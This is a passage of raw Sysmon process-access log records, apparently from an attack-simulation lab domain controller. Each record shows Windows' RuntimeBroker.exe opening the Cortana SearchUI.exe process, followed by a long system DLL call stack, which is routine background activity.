indows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406140C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406140C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405552C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405552C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405268C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405352C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405268C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405352C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405484C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405484C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405460C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405460C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
